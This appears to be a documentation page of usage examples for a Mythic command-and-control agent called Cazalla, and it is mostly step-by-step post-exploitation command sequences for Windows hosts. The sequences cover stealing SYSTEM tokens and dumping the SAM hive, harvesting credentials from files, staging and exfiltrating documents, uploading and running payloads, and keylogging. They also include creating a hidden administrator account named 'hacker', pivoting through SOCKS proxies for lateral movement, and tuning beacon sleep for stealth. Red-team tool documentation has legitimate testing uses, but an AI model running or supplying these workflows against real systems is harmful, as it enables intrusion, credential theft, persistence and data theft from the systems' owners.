+++ title = "Examples" chapter = false weight = 10 pre = "5. " +++ # Cazalla Usage Examples This document provides practical examples and use cases for using Cazalla agent in real-world scenarios. ## 📋 Table of Contents - [Basic Operations](#basic-operations) - [File System Operations](#file-system-operations) - [Process Management](#process-management) - [Token Operations](#token-operations) - [Network Tunneling](#network-tunneling) - [Credential Harvesting](#credential-harvesting) - [Common Workflows](#common-workflows) --- ## Basic Operations ### Initial Reconnaissance After deploying the agent, start with basic reconnaissance: ```bash # Check current user context whoami # List current directory pwd # List files in current directory ls # List running processes ps # Identify installed browsers browser_info # Check current directory contents ls C:\Users ``` ### Navigate File System ```bash # Change to user directory cd C:\Users\Administrator # List files ls # Check current directory pwd # Change to Desktop cd Desktop # List Desktop contents ls ``` --- ## File System Operations ### Reading Files ```bash # Read a text file cat C:\Users\Administrator\Desktop\notes.txt # Read configuration file (may detect credentials) cat C:\Windows\System32\config\sam # Read hosts file cat C:\Windows\System32\drivers\etc\hosts # Read file with relative path (from current directory) cd C:\Users\Administrator\Desktop cat notes.txt ``` ### Downloading Files ```bash # Download a small file download C:\Users\Administrator\Desktop\important.txt # Download a large file (chunked automatically) download C:\Windows\System32\config\sam # Download with relative path cd C:\Users\Administrator\Desktop download important.txt ``` ### Uploading Files ```bash # Upload a file (requires file_id from Mythic) # 1. Upload file to Mythic UI first # 2. Get file_id from Files page # 3. Execute upload command upload C:\Users\Administrator\Desktop\payload.exe # Upload to directory (filename auto-appended) upload C:\Users\Administrator\Desktop # Upload to staging directory mkdir C:\temp\staging upload C:\temp\staging ``` ### File Management ```bash # Copy a file cp C:\Users\Administrator\Desktop\file.txt C:\temp\backup.txt # Create directory mkdir C:\temp\new_folder # Delete file rm C:\temp\old_file.txt # Delete directory rm C:\temp\old_folder ``` --- ## Process Management ### Process Enumeration ```bash # List all processes ps # View processes in Process Browser UI # Navigate to PROCESSES tab in Mythic UI ``` ### Process Termination ```bash # Kill a process by PID kill 1234 # Kill from Process Browser UI # Right-click process → Kill Process ``` ### Process Investigation ```bash # List processes to find target ps # Identify process by name (look for explorer.exe, chrome.exe, etc.) # Note the PID # Kill the process kill ``` --- ## Token Operations ### Token Enumeration ```bash # List all available tokens list_tokens # Look for high-value tokens (SYSTEM, Domain Admins, etc.) # Note the PID of the process ``` ### Token Theft ```bash # Steal token from a process steal_token 1060 # Verify impersonation whoami # Output: NT AUTHORITY\SYSTEM # Execute commands with stolen token # (Commands will run with token's privileges if selected in Mythic UI) ``` ### Token Creation ```bash # Create token with domain credentials make_token DOMAIN username password # Create token for local user make_token "" Administrator P@ssw0rd123 # Verify token creation whoami # Output: DOMAIN\username # Use token for tasking # (Select token from dropdown in Mythic UI before issuing commands) ``` ### Token Reversion ```bash # After completing privileged operations rev2self # Verify reversion whoami # Output: Original user context ``` ### Complete Token Workflow ```bash # 1. Check current context whoami # Output: DESKTOP-ABC\localuser # 2. List available tokens list_tokens # Find SYSTEM token (PID 1060) # 3. Steal token steal_token 1060 # 4. Verify impersonation whoami # Output: NT AUTHORITY\SYSTEM # 5. Execute privileged operations # (Commands run with SYSTEM privileges) # 6. Revert to original token rev2self # 7. Verify reversion whoami # Output: DESKTOP-ABC\localuser ``` --- ## Network Tunneling ### SOCKS Proxy Example ```bash # Start SOCKS proxy socks {"action":"start","port":7002} # Configure proxychains on your machine # Edit /etc/proxychains.conf: [ProxyList] socks5 7002 # Use proxychains with tools proxychains curl https://internal-server.local proxychains nmap -sT 192.168.1.0/24 proxychains wget https://internal-server.local/file.txt # Stop SOCKS proxy socks {"action":"stop","port":7002} ``` ### Reverse Port Forwarding Example ```bash # Start reverse port forward # Agent listens on 8080, forwards to 192.168.1.100:80 rpfwd {"action":"start","port":8080,"remote_host":"192.168.1.100","remote_port":80} # Connect to agent:8080 (from another machine) curl http://:8080 # Connection is forwarded to 192.168.1.100:80 # Stop reverse port forward rpfwd {"action":"stop","port":8080} ``` ### Database Access via RPFWD ```bash # Tunnel database connections rpfwd {"action":"start","port":3306,"remote_host":"10.0.0.50","remote_port":3306} # Connect to MySQL through agent (from another machine) mysql -h -P 3306 -u user -p ``` --- ## Credential Harvesting ### Automatic Credential Detection The `cat` command automatically detects and reports credentials: ```bash # Read a file that may contain credentials cat C:\Users\Administrator\Desktop\config.txt # If credentials are found, they are automatically: # - Detected in file content # - Reported to Mythic's credential store # - Visible in CREDENTIALS tab # Example file content that triggers detection: # username:password # domain\username:password # username@domain.com:password # password=secret123 # http://user:pass@host.com # aad3b435b51404ee:hash... ``` ### Credential Extraction Workflow ```bash # 1. Find configuration files cd C:\Users\Administrator ls # 2. Read configuration files cat .config cat credentials.txt cat config.ini # 3. Check Credentials tab in Mythic UI # All discovered credentials appear automatically # 4. Use credentials for token creation make_token DOMAIN username password ``` --- ## Common Workflows ### Initial System Reconnaissance ```bash # 1. Check current context whoami pwd # 2. List processes ps # 3. Navigate user directory cd C:\Users ls # 4. Check Desktop for interesting files cd Administrator\Desktop ls # 5. Read interesting files cat notes.txt cat config.txt ``` ### Privilege Escalation Workflow ```bash # 1. List available tokens list_tokens # 2. Identify high-value token (SYSTEM, Domain Admin, etc.) # Note the PID # 3. Steal token steal_token # 4. Verify impersonation whoami # 5. Execute privileged operations # (Commands run with stolen token's privileges) # 6. Revert to original token rev2self ``` ### Data Exfiltration Workflow ```bash # 1. Navigate to target directory cd C:\Users\Administrator\Documents # 2. List files ls # 3. Download important files download important_document.pdf download database_backup.sql # 4. Create staging directory mkdir C:\temp\exfil # 5. Copy files to staging cp important_document.pdf C:\temp\exfil cp database_backup.sql C:\temp\exfil # 6. Download from staging cd C:\temp\exfil download important_document.pdf download database_backup.sql # 7. Clean up staging cd C:\temp rm exfil ``` ### Lateral Movement via SOCKS ```bash # 1. Start SOCKS proxy socks {"action":"start","port":7002} # 2. Configure proxychains on your machine # Edit /etc/proxychains.conf: [ProxyList] socks5 7002 # 3. Use proxychains for lateral movement proxychains smbclient //internal-server.local/share -U user proxychains rdesktop internal-server.local proxychains ssh user@internal-server.local ``` ### File Upload and Execution ```bash # 1. Upload payload to staging directory mkdir C:\temp\staging upload C:\temp\staging\payload.exe # 2. Verify upload ls C:\temp\staging # 3. Execute payload (if needed) shell C:\temp\staging\payload.exe # 4. Clean up rm C:\temp\staging\payload.exe ``` ### Screenshot Capture ```bash # Capture screenshot screenshot # Screenshot is automatically uploaded to Mythic # View in Files tab or Screenshot UI ``` ### Keylogging Session ```bash # 1. Start keylogger keylog_start # WARNING: This has CRITICAL OPSEC RISK # Always requires lead operator approval # 2. Let keylogger run for desired duration # Keystrokes are automatically captured and sent to Mythic # 3. View keylogs in Mythic UI # Navigate to KEYLOGS tab # 4. Stop keylogger keylog_stop ``` ### Complete Post-Exploitation Workflow ```bash # 1. Initial reconnaissance whoami pwd ps ls # 2. Navigate user directory cd C:\Users\Administrator ls Desktop # 3. Read interesting files cat Desktop\notes.txt cat Desktop\config.txt # 4. Download important files download Desktop\important.pdf # 5. Token enumeration list_tokens # 6. Steal high-value token steal_token # 7. Verify impersonation whoami # 8. Execute privileged operations # (Commands run with stolen token's privileges) # 9. Capture screenshot screenshot # 10. Revert token rev2self # 11. Adjust sleep for stealth sleep {"seconds":60,"jitter":20} ``` --- ## Advanced Examples ### Multi-Step Privilege Escalation ```bash # 1. List tokens to find SYSTEM process list_tokens # 2. Steal SYSTEM token steal_token # 3. Verify SYSTEM context whoami # Output: NT AUTHORITY\SYSTEM # 4. Access protected files cat C:\Windows\System32\config\sam download C:\Windows\System32\config\sam # 5. Create new user with SYSTEM privileges shell net user hacker P@ssw0rd123 /add shell net localgroup administrators hacker /add # 6. Revert to original token rev2self ``` ### Network Pivoting via SOCKS ```bash # 1. Start SOCKS proxy socks {"action":"start","port":7002} # 2. Configure proxychains # Edit /etc/proxychains.conf: [ProxyList] socks5 7002 # 3. Scan internal network proxychains nmap -sT 192.168.1.0/24 # 4. Access internal services proxychains curl http://192.168.1.100 proxychains smbclient //192.168.1.100/share -U user # 5. Stop SOCKS proxy socks {"action":"stop","port":7002} ``` ### Credential Extraction and Lateral Movement ```bash # 1. Read configuration files cat C:\Users\Administrator\Desktop\config.txt # Credentials automatically detected and reported # 2. Check Credentials tab in Mythic UI # Find extracted credentials # 3. Create token with extracted credentials make_token DOMAIN username password # 4. Verify token creation whoami # Output: DOMAIN\username # 5. Use token for lateral movement # (Commands run with domain credentials if token selected) ``` --- ## Tips and Best Practices ### Use Built-in Commands **❌ Avoid:** ```bash shell whoami shell tasklist shell dir ``` **✅ Prefer:** ```bash whoami ps ls ``` ### Use Relative Paths ```bash # Change to target directory first cd C:\Users\Administrator\Desktop # Then use relative paths ls cat notes.txt download important.pdf ``` ### Monitor Artifacts After executing commands, always check the Artifacts tab in Mythic UI to see what forensic evidence was created. ### Review OPSEC Warnings Always read and understand OPSEC popup messages before approving commands. ### Use Appropriate Sleep Intervals ```bash # Initial deployment (stealth) sleep {"seconds":60,"jitter":30} # Interactive operations sleep {"seconds":10,"jitter":10} # Stealth mode sleep {"seconds":120,"jitter":40} ``` --- ## Related Documentation - [Commands Reference](commands.md) - Detailed command documentation - [OPSEC Guide](opsec.md) - Operational security considerations - [Features Overview](features.md) - Feature explanations - [Getting Started](getting-started.md) - Installation and setup --- **Last Updated:** 2024